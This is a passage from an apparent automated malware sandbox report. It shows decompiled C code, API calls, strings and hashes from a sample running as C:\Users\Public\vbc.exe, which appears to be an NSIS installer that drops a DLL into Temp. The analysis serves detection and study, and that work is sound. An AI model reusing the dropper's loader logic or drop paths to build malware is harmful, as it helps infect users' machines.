                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                          • String ID: "C:\Users\Public\vbc.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$hnahgvbse
                                          • API String ID: 914957316-1531098974
                                          • Opcode ID: ddebcaf873b3f80ffc25d6dfb232b9e28d9230a7995e8b1577ae424d02e99e0f
                                          • Instruction ID: 2e12796d13047950d683a8fbe5a4005f9ba98cb8c12c36bead37cfa09a1e5f4f
                                          • Opcode Fuzzy Hash: ddebcaf873b3f80ffc25d6dfb232b9e28d9230a7995e8b1577ae424d02e99e0f
                                          • Instruction Fuzzy Hash: 4C61C5B0644244BED620AF629D45E273AACEB4575AF44443FF941B22E2D73DAD018A3E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00402C0B, Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 80%
                                          			E00402C0B(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				signed int _t50;
				void* _t53;
				signed int _t54;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				signed int _t65;
				signed int _t67;
				signed int _t70;
				signed int _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				signed int _t85;
				signed int _t87;
				void* _t89;
				signed int _t90;
				signed int _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = "C:\\Users\\Public\\vbc.exe";
				 *0x42eb6c = _t43 + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\Public\\vbc.exe", 0x400);
				_t89 = E00405602(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x409010 = _t89;
				if(_t89 == 0xffffffff) {
					return "Error launching installer";
				}
				_t92 = "C:\\Users\\Public";
				E0040592B("C:\\Users\\Public", _t91);
				E0040592B(0x436000, E00405465(_t92));
				_t50 = GetFileSize(_t89, 0);
				__eflags = _t50;
				 *0x428b88 = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00402BB0(1);
					__eflags =  *0x42eb74 - _t82; // 0x31a00
					if(__eflags == 0) {
						goto L29;
					}
					__eflags = _v8 - _t82;
					if(_v8 == _t82) {
						L28:
						_t53 = GlobalAlloc(0x40, _v24); // executed
						_t94 = _t53;
						_t54 =  *0x42eb74; // 0x31a00
						E00403098(_t54 + 0x1c);
						_push(_v24);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff);
						_t57 = E00402E44();
						__eflags = _t57 - _v24;
						if(_t57 == _v24) {
							__eflags = _v44 & 0x00000001;
							 *0x42eb70 = _t94;
							 *0x42eb78 =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x42eb7c =  *0x42eb7c + 1;
								__eflags =  *0x42eb7c;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
								__eflags = _t85;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E004055C3(0x42eb80, _t94 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						goto L29;
					}
					E00403098( *0x414b78);
					_t65 = E00403066( &_a4, 4); // executed
					__eflags = _t65;
					if(_t65 == 0) {
						goto L29;
					}
					__eflags = _v12 - _a4;
					if(_v12 != _a4) {
						goto L29;
					}
					goto L28;
				} else {
					do {
						_t67 =  *0x42eb74; // 0x31a00
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~_t67 & 0x00007e00) + 0x200;
						__eflags = _t93 - _t70;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E00403066(0x420b88, _t90); // executed
						__eflags = _t71;
						if(_t71 == 0) {
							E00402BB0(1);
							L29:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x42eb74;
						if( *0x42eb74 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402BB0(0);
							}
							goto L20;
						}
						E004055C3( &_v44, 0x420b88, 0x1c);
						_t77 = _v44;
						__eflags = _t77 & 0xfffffff0;
						if((_t77 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v40 - 0xdeadbeef;
						if(_v40 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v28 - 0x74736e49;
						if(_v28 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v32 - 0x74666f73;
						if(_v32 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v36 - 0x6c6c754e;
						if(_v36 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t77;
						_t87 =  *0x414b78; // 0x7431a
						 *0x42ec00 =  *0x42ec00 | _a4 & 0x00000002;
						_t80 = _v20;
						__eflags = _t80 - _t93;
						 *0x42eb74 = _t87;
						if(_t80 > _t93) {
							goto L29;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v8 = _v8 + 1;
							_t24 = _t80 - 4; // 0x409154
							_t93 = _t24;
							__eflags = _t90 - _t93;
							if(_t90 > _t93) {
								_t90 = _t93;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t93 -  *0x428b88; // 0x7431e
						if(__eflags < 0) {
							_v12 = E00405CB5(_v12, 0x420b88, _t90);
						}
						 *0x414b78 =  *0x414b78 + _t90;
						_t93 = _t93 - _t90;
						__eflags = _t93;
					} while (_t93 > 0);
					_t82 = 0;
					__eflags = 0;
					goto L24;
				}
			}

































                                          0x00402c13
                                          0x00402c16
                                          0x00402c19
                                          0x00402c1c
                                          0x00402c22
                                          0x00402c33
                                          0x00402c38
                                          0x00402c4b
                                          0x00402c50
                                          0x00402c53
                                          0x00402c59
                                          0x00000000
                                          0x00402c5b
                                          0x00402c66
                                          0x00402c6c
                                          0x00402c7d
                                          0x00402c84
                                          0x00402c8a
                                          0x00402c8c
                                          0x00402c91
                                          0x00402c93
                                          0x00402d80
                                          0x00402d82
                                          0x00402d87
                                          0x00402d8e
                                          0x00000000
                                          0x00000000
                                          0x00402d90
                                          0x00402d93
                                          0x00402db7
                                          0x00402dbc
                                          0x00402dc2
                                          0x00402dc4
                                          0x00402dcd
                                          0x00402dd2
                                          0x00402dd5
                                          0x00402dd6
                                          0x00402dd7
                                          0x00402dd9
                                          0x00402dde
                                          0x00402de1
                                          0x00402df4
                                          0x00402df8
                                          0x00402e00
                                          0x00402e05
                                          0x00402e07
                                          0x00402e07
                                          0x00402e07
                                          0x00402e0f
                                          0x00402e0f
                                          0x00402e12
                                          0x00402e13
                                          0x00402e13
                                          0x00402e16
                                          0x00402e18
                                          0x00402e18
                                          0x00402e18
                                          0x00402e22
                                          0x00402e28
                                          0x00402e36
                                          0x00402e3b
                                          0x00000000
                                          0x00402e3b
                                          0x00000000
                                          0x00402de1
                                          0x00402d9b
                                          0x00402da6
                                          0x00402dab
                                          0x00402dad
                                          0x00000000
                                          0x00000000
                                          0x00402db2
                                          0x00402db5
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00402c99
                                          0x00402c9e
                                          0x00402c9e
                                          0x00402ca3
                                          0x00402ca7
                                          0x00402cae
                                          0x00402cb3
                                          0x00402cb5
                                          0x00402cb7
                                          0x00402cb7
                                          0x00402cbb
                                          0x00402cc0
                                          0x00402cc2
                                          0x00402dec
                                          0x00402de3
                                          0x00000000
                                          0x00402de3
                                          0x00402cc8
                                          0x00402ccf
                                          0x00402d4b
                                          0x00402d4f
                                          0x00402d53
                                          0x00402d58
                                          0x00000000
                                          0x00402d4f
                                          0x00402cd8
                                          0x00402cdd
                                          0x00402ce0
                                          0x00402ce5
                                          0x00000000
                                          0x00000000
                                          0x00402ce7
                                          0x00402cee
                                          0x00000000
                                          0x00000000
                                          0x00402cf0
                                          0x00402cf7
                                          0x00000000
                                          0x00000000
                                          0x00402cf9
                                          0x00402d00
                                          0x00000000
                                          0x00000000
                                          0x00402d02
                                          0x00402d09
                                          0x00000000
                                          0x00000000
                                          0x00402d0b
                                          0x00402d11
                                          0x00402d1a
                                          0x00402d20
                                          0x00402d23
                                          0x00402d25
                                          0x00402d2b
                                          0x00000000
                                          0x00000000
                                          0x00402d31
                                          0x00402d35
                                          0x00402d3d
                                          0x00402d3d
                                          0x00402d40
                                          0x00402d40
                                          0x00402d43
                                          0x00402d45
                                          0x00402d47
                                          0x00402d47
                                          0x00000000
                                          0x00402d45
                                          0x00402d37
                                          0x00402d3b
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00402d59
                                          0x00402d59
                                          0x00402d5f
                                          0x00402d6b
                                          0x00402d6b
                                          0x00402d6e
                                          0x00402d74
                                          0x00402d76
                                          0x00402d76
                                          0x00402d7e
                                          0x00402d7e
                                          0x00000000
                                          0x00402d7e

                                          APIs
                                          • GetTickCount.KERNEL32("C:\Users\Public\vbc.exe" ,00000000,00000000), ref: 00402C1C
                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\Public\vbc.exe,00000400), ref: 00402C38
                                            • Part of subcall function 00405602: GetFileAttributesA.KERNEL32(00000003,00402C4B,C:\Users\Public\vbc.exe,80000000,00000003), ref: 00405606
                                            • Part of subcall function 00405602: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405628
                                          • GetFileSize.KERNEL32(00000000,00000000,00436000,00000000,C:\Users\Public,C:\Users\Public,C:\Users\Public\vbc.exe,C:\Users\Public\vbc.exe,80000000,00000003), ref: 00402C84
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: File$AttributesCountCreateModuleNameSizeTick
                                          • String ID: "C:\Users\Public\vbc.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\Public$C:\Users\Public\vbc.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                          • API String ID: 4283519449-3503189988
                                          • Opcode ID: 0c7fdcf59c0fb2b92b8374371fd2f99e1dcbb6099d677134b975e3fd63279e42
                                          • Instruction ID: 825a226a8dc595578503c7203fc5804032ed62a4dd83b14a28db2b62ef09ea34
                                          • Opcode Fuzzy Hash: 0c7fdcf59c0fb2b92b8374371fd2f99e1dcbb6099d677134b975e3fd63279e42
                                          • Instruction Fuzzy Hash: 0651D371900214ABDF20AF75DE89BAE7BA8EF04319F10457BF500B22D1C7B89D418B9D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00401734, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147stringtimeCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 60%
                                          			E00401734(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				void* _t85;

				_t75 = __ebx;
				_t82 = E004029E8(0x31);
				 *(_t85 - 8) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x24) & 0x00000007;
				_t33 = E0040548B(_t82);
				_push(_t82);
				if(_t33 == 0) {
					lstrcatA(E0040541E(E0040592B(0x409b78, "C:\\Users\\Albus\\AppData\\Local\\Temp")), ??);
				} else {
					_push(0x409b78);
					E0040592B();
				}
				E00405B89(0x409b78);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E00405C22(0x409b78);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x18);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E004055E3(0x409b78);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E00405602(0x409b78, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 0x34) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00404CC9(0xffffffe2,  *(_t85 - 8));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x42ebe8;
						goto L32;
					} else {
						E0040592B(0x40a378, 0x42f000);
						E0040592B(0x42f000, 0x409b78);
						E0040594D(_t75, 0x40a378, 0x409b78, "C:\Users\Albus\AppData\Local\Temp\nssE7A3.tmp\folvcfp.dll",  *((intOrPtr*)(_t85 - 0x10)));
						E0040592B(0x42f000, 0x40a378);
						_t62 = E004051EC("C:\Users\Albus\AppData\Local\Temp\nssE7A3.tmp\folvcfp.dll",  *(_t85 - 0x24) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x42ebe8 =  &( *0x42ebe8->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x409b78);
								_push(0xfffffffa);
								E00404CC9();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404CC9(0xffffffea,  *(_t85 - 8));
				 *0x42ec14 =  *0x42ec14 + 1;
				_push(_t75);
				_push(_t75);
				_push( *(_t85 - 0x34));
				_push( *((intOrPtr*)(_t85 - 0x1c)));
				_t43 = E00402E44(); // executed
				 *0x42ec14 =  *0x42ec14 - 1;
				__eflags =  *(_t85 - 0x18) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x18) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 0x34), _t85 - 0x18, _t75, _t85 - 0x18); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x14)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x14)) != 0xffffffff) {
						goto L22;
					}
				}
				CloseHandle( *(_t85 - 0x34)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E0040594D(_t75, _t80, 0x409b78, 0x409b78, 0xffffffee);
					} else {
						E0040594D(_t75, _t80, 0x409b78, 0x409b78, 0xffffffe9);
						lstrcatA(0x409b78,  *(_t85 - 8));
					}
					_push(0x200010);
					_push(0x409b78);
					E004051EC();
					goto L29;
				}
				goto L33;
			}
















                                          0x00401734
                                          0x0040173b
                                          0x00401744
                                          0x00401747
                                          0x0040174a
                                          0x0040174f
                                          0x00401757
                                          0x00401773
                                          0x00401759
                                          0x00401759
                                          0x0040175a
                                          0x0040175a
                                          0x00401779
                                          0x00401783
                                          0x00401783
                                          0x00401787
                                          0x0040178a
                                          0x0040178f
                                          0x00401791
                                          0x00401793
                                          0x00401798
                                          0x00401798
                                          0x004017a3
                                          0x004017a3
                                          0x004017b4
                                          0x004017b6
                                          0x004017b6
                                          0x004017b7
                                          0x004017b7
                                          0x004017ba
                                          0x004017bd
                                          0x004017c0
                                          0x004017c0
                                          0x004017c7
                                          0x004017d6
                                          0x004017db
                                          0x004017de
                                          0x004017e1
                                          0x00000000
                                          0x00000000
                                          0x004017e3
                                          0x004017e6
                                          0x00401840
                                          0x00401845
                                          0x004015a8
                                          0x0040264e
                                          0x0040264e
                                          0x0040287d
                                          0x00402880
                                          0x00402880
                                          0x00000000
                                          0x004017e8
                                          0x004017ee
                                          0x004017f9
                                          0x00401806
                                          0x00401811
                                          0x00401827
                                          0x00401827
                                          0x0040182a
                                          0x00000000
                                          0x00401830
                                          0x00401830
                                          0x00401831
                                          0x0040184e
                                          0x00402886
                                          0x00402886
                                          0x00402886
                                          0x00401833
                                          0x00401833
                                          0x00401834
                                          0x00401492
                                          0x00402200
                                          0x00402200
                                          0x00402200
                                          0x00401831
                                          0x0040182a
                                          0x00402888
                                          0x0040288c
                                          0x0040288c
                                          0x0040185e
                                          0x00401863
                                          0x00401869
                                          0x0040186a
                                          0x0040186b
                                          0x0040186e
                                          0x00401871
                                          0x00401876
                                          0x0040187c
                                          0x00401880
                                          0x00401882
                                          0x0040188a
                                          0x00401896
                                          0x00401884
                                          0x00401884
                                          0x00401888
                                          0x00000000
                                          0x00000000
                                          0x00401888
                                          0x0040189f
                                          0x004018a5
                                          0x004018a7
                                          0x00000000
                                          0x004018ad
                                          0x004018ad
                                          0x004018b0
                                          0x004018c8
                                          0x004018b2
                                          0x004018b5
                                          0x004018be
                                          0x004018be
                                          0x004018cd
                                          0x004018d2
                                          0x004021fb
                                          0x00000000
                                          0x004021fb
                                          0x00000000

                                          APIs
                                          • lstrcatA.KERNEL32(00000000,00000000,hnahgvbse,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401773
                                          • CompareFileTime.KERNEL32(-00000014,?,hnahgvbse,hnahgvbse,00000000,00000000,hnahgvbse,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 0040179D
                                            • Part of subcall function 0040592B: lstrcpynA.KERNEL32(?,?,00000400,00403151,psfiki Setup,NSIS Error), ref: 00405938
                                            • Part of subcall function 00404CC9: lstrlenA.KERNEL32(004297B0,00000000,0041FA6B,74EC110C,?,?,?,?,?,?,?,?,?,00402F9F,00000000,?), ref: 00404D02
                                            • Part of subcall function 00404CC9: lstrlenA.KERNEL32(00402F9F,004297B0,00000000,0041FA6B,74EC110C,?,?,?,?,?,?,?,?,?,00402F9F,00000000), ref: 00404D12
                                            • Part of subcall function 00404CC9: lstrcatA.KERNEL32(004297B0,00402F9F,00402F9F,004297B0,00000000,0041FA6B,74EC110C), ref: 00404D25
                                            • Part of subcall function 00404CC9: SetWindowTextA.USER32(004297B0,004297B0), ref: 00404D37
                                            • Part of subcall function 00404CC9: SendMessageA.USER32 ref: 00404D5D
                                            • Part of subcall function 00404CC9: SendMessageA.USER32 ref: 00404D77
                                            • Part of subcall function 00404CC9: SendMessageA.USER32 ref: 00404D85
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                          • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nssE7A3.tmp$C:\Users\user\AppData\Local\Temp\nssE7A3.tmp\folvcfp.dll$hnahgvbse
                                          • API String ID: 1941528284-1248813526
                                          • Opcode ID: 9637652f00c021062d2dbe4245cc16957b59b03da3b62afee8cfd87e020825ba
                                          • Instruction ID: 57f74d31a3863b2a576bf3fc3f2571be4e71849821accf25204d9298bb77468e
                                          • Opcode Fuzzy Hash: 9637652f00c021062d2dbe4245cc16957b59b03da3b62afee8cfd87e020825ba
                                          • Instruction Fuzzy Hash: 6C41B471900515FACF10BBB5DD46EAF36A9EF01368B20433BF511B21E1D63C8E418AAE
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00402E44, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 174fileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 95%
                                          			E00402E44(int _a4, void* _a8, long _a12, int _a16, signed char _a19) {
				signed int _v8;
				long _v12;
				void* _v16;
				long _v20;
				long _v24;
				intOrPtr _v28;
				char _v92;
				void* _t67;
				void* _t68;
				long _t74;
				intOrPtr _t79;
				long _t80;
				void* _t82;
				int _t84;
				intOrPtr _t95;
				void* _t97;
				void* _t100;
				long _t101;
				signed int _t102;
				long _t103;
				int _t104;
				intOrPtr _t105;
				long _t106;
				void* _t107;

				_t102 = _a16;
				_t97 = _a12;
				_v12 = _t102;
				if(_t97 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_v16 = _t97;
				if(_t97 == 0) {
					_v16 = 0x418b80;
				}
				_t65 = _a4;
				if(_a4 >= 0) {
					_t95 =  *0x42ebb8; // 0x32ba3
					E00403098(_t95 + _t65);
				}
				_t67 = E00403066( &_a16, 4); // executed
				if(_t67 == 0) {
					L34:
					_push(0xfffffffd);
					goto L35;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t97 == 0) {
							while(_a16 > 0) {
								_t103 = _v12;
								if(_a16 < _t103) {
									_t103 = _a16;
								}
								if(E00403066(0x414b80, _t103) == 0) {
									goto L34;
								} else {
									if(WriteFile(_a8, 0x414b80, _t103,  &_a12, 0) == 0 || _t103 != _a12) {
										L29:
										_push(0xfffffffe);
										L35:
										_pop(_t68);
										return _t68;
									} else {
										_v8 = _v8 + _t103;
										_a16 = _a16 - _t103;
										continue;
									}
								}
							}
							L45:
							return _v8;
						}
						if(_a16 < _t102) {
							_t102 = _a16;
						}
						if(E00403066(_t97, _t102) != 0) {
							_v8 = _t102;
							goto L45;
						} else {
							goto L34;
						}
					}
					_t74 = GetTickCount();
					 *0x40b4e4 =  *0x40b4e4 & 0x00000000;
					 *0x40b4e0 =  *0x40b4e0 & 0x00000000;
					_t14 =  &_a16;
					 *_t14 = _a16 & 0x7fffffff;
					_v20 = _t74;
					 *0x40afc8 = 8;
					 *0x414b70 = 0x40cb68;
					 *0x414b6c = 0x40cb68;
					 *0x414b68 = 0x414b68;
					_a4 = _a16;
					if( *_t14 <= 0) {
						goto L45;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t104 = 0x4000;
						if(_a16 < 0x4000) {
							_t104 = _a16;
						}
						if(E00403066(0x414b80, _t104) == 0) {
							goto L34;
						}
						_a16 = _a16 - _t104;
						 *0x40afb8 = 0x414b80;
						 *0x40afbc = _t104;
						while(1) {
							_t100 = _v16;
							 *0x40afc0 = _t100;
							 *0x40afc4 = _v12;
							_t79 = E00405D23(0x40afb8);
							_v28 = _t79;
							if(_t79 < 0) {
								break;
							}
							_t105 =  *0x40afc0; // 0x41fa6b
							_t106 = _t105 - _t100;
							_t80 = GetTickCount();
							_t101 = _t80;
							if(( *0x42ec14 & 0x00000001) != 0 && (_t80 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfA( &_v92, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t107 = _t107 + 0xc;
								E00404CC9(0,  &_v92);
								_v20 = _t101;
							}
							if(_t106 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L45;
							} else {
								if(_a12 != 0) {
									_t82 =  *0x40afc0; // 0x41fa6b
									_v8 = _v8 + _t106;
									_v12 = _v12 - _t106;
									_v16 = _t82;
									L24:
									if(_v28 != 1) {
										continue;
									}
									goto L45;
								}
								_t84 = WriteFile(_a8, _v16, _t106,  &_v24, 0); // executed
								if(_t84 == 0 || _v24 != _t106) {
									goto L29;
								} else {
									_v8 = _v8 + _t106;
									goto L24;
								}
							}
						}
						_push(0xfffffffc);
						goto L35;
					}
					goto L34;
				}
			}



























                                          0x00402e4c
                                          0x00402e50
                                          0x00402e53
                                          0x00402e58
                                          0x00402e5a
                                          0x00402e5a
                                          0x00402e61
                                          0x00402e65
                                          0x00402e6a
                                          0x00402e6c
                                          0x00402e6c
                                          0x00402e73
                                          0x00402e78
                                          0x00402e7a
                                          0x00402e83
                                          0x00402e83
                                          0x00402e8e
                                          0x00402e95
                                          0x00403011
                                          0x00403011
                                          0x00000000
                                          0x00402e9b
                                          0x00402e9f
                                          0x00402ffc
                                          0x00403051
                                          0x00403016
                                          0x0040301c
                                          0x0040301e
                                          0x0040301e
                                          0x0040302f
                                          0x00000000
                                          0x00403031
                                          0x00403044
                                          0x00402ff6
                                          0x00402ff6
                                          0x00403013
                                          0x00403013
                                          0x00000000
                                          0x0040304b
                                          0x0040304b
                                          0x0040304e
                                          0x00000000
                                          0x0040304e
                                          0x00403044
                                          0x0040302f
                                          0x0040305c
                                          0x00000000
                                          0x0040305c
                                          0x00403001
                                          0x00403003
                                          0x00403003
                                          0x0040300f
                                          0x00403059
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040300f
                                          0x00402eab
                                          0x00402ead
                                          0x00402eb4
                                          0x00402ebb
                                          0x00402ebb
                                          0x00402ec2
                                          0x00402eca
                                          0x00402ed4
                                          0x00402ed9
                                          0x00402ee1
                                          0x00402eeb
                                          0x00402eee
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00402ef4
                                          0x00402ef4
                                          0x00402ef4
                                          0x00402efc
                                          0x00402efe
                                          0x00402efe
                                          0x00402f0f
                                          0x00000000
                                          0x00000000
                                          0x00402f15
                                          0x00402f18
                                          0x00402f1e
                                          0x00402f24
                                          0x00402f24
                                          0x00402f2f
                                          0x00402f35
                                          0x00402f3a
                                          0x00402f41
                                          0x00402f44
                                          0x00000000
                                          0x00000000
                                          0x00402f4a
                                          0x00402f50
                                          0x00402f52
                                          0x00402f5b
                                          0x00402f5d
                                          0x00402f8b
                                          0x00402f91
                                          0x00402f9a
                                          0x00402f9f
                                          0x00402f9f
                                          0x00402fa6
                                          0x00402fea
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00402fa8
                                          0x00402fab
                                          0x00402fcd
                                          0x00402fd2
                                          0x00402fd5
                                          0x00402fd8
                                          0x00402fdb
                                          0x00402fdf
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00402fe5
                                          0x00402fb9
                                          0x00402fc1
                                          0x00000000
                                          0x00402fc8
                                          0x00402fc8
                                          0x00000000
                                          0x00402fc8
                                          0x00402fc1
                                          0x00402fa6
                                          0x00402ff2
                                          0x00000000
                                          0x00402ff2
                                          0x00000000
                                          0x00402ef4

                                          APIs
                                          • GetTickCount.KERNEL32(000000FF,00000004,00000000,00000000,00000000), ref: 00402EAB
                                          • GetTickCount.KERNEL32(0040AFB8,00414B80,00004000), ref: 00402F52
                                          • MulDiv.KERNEL32 ref: 00402F7B
                                          • wsprintfA.USER32 ref: 00402F8B
                                          • WriteFile.KERNEL32(00000000,00000000,0041FA6B,7FFFFFFF,00000000), ref: 00402FB9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: CountTick$FileWritewsprintf
                                          • String ID: ... %d%%
                                          • API String ID: 4209647438-2449383134
                                          • Opcode ID: 82a9aedbd2f3b533e53c55a0f3032eb9fe86cf46c86e88442e97a38cb8fe0156
                                          • Instruction ID: 9e0124e4ae7d277b0b54c9942477664c6d45ab1b3c5c68ad5b6cbbf63d84754e
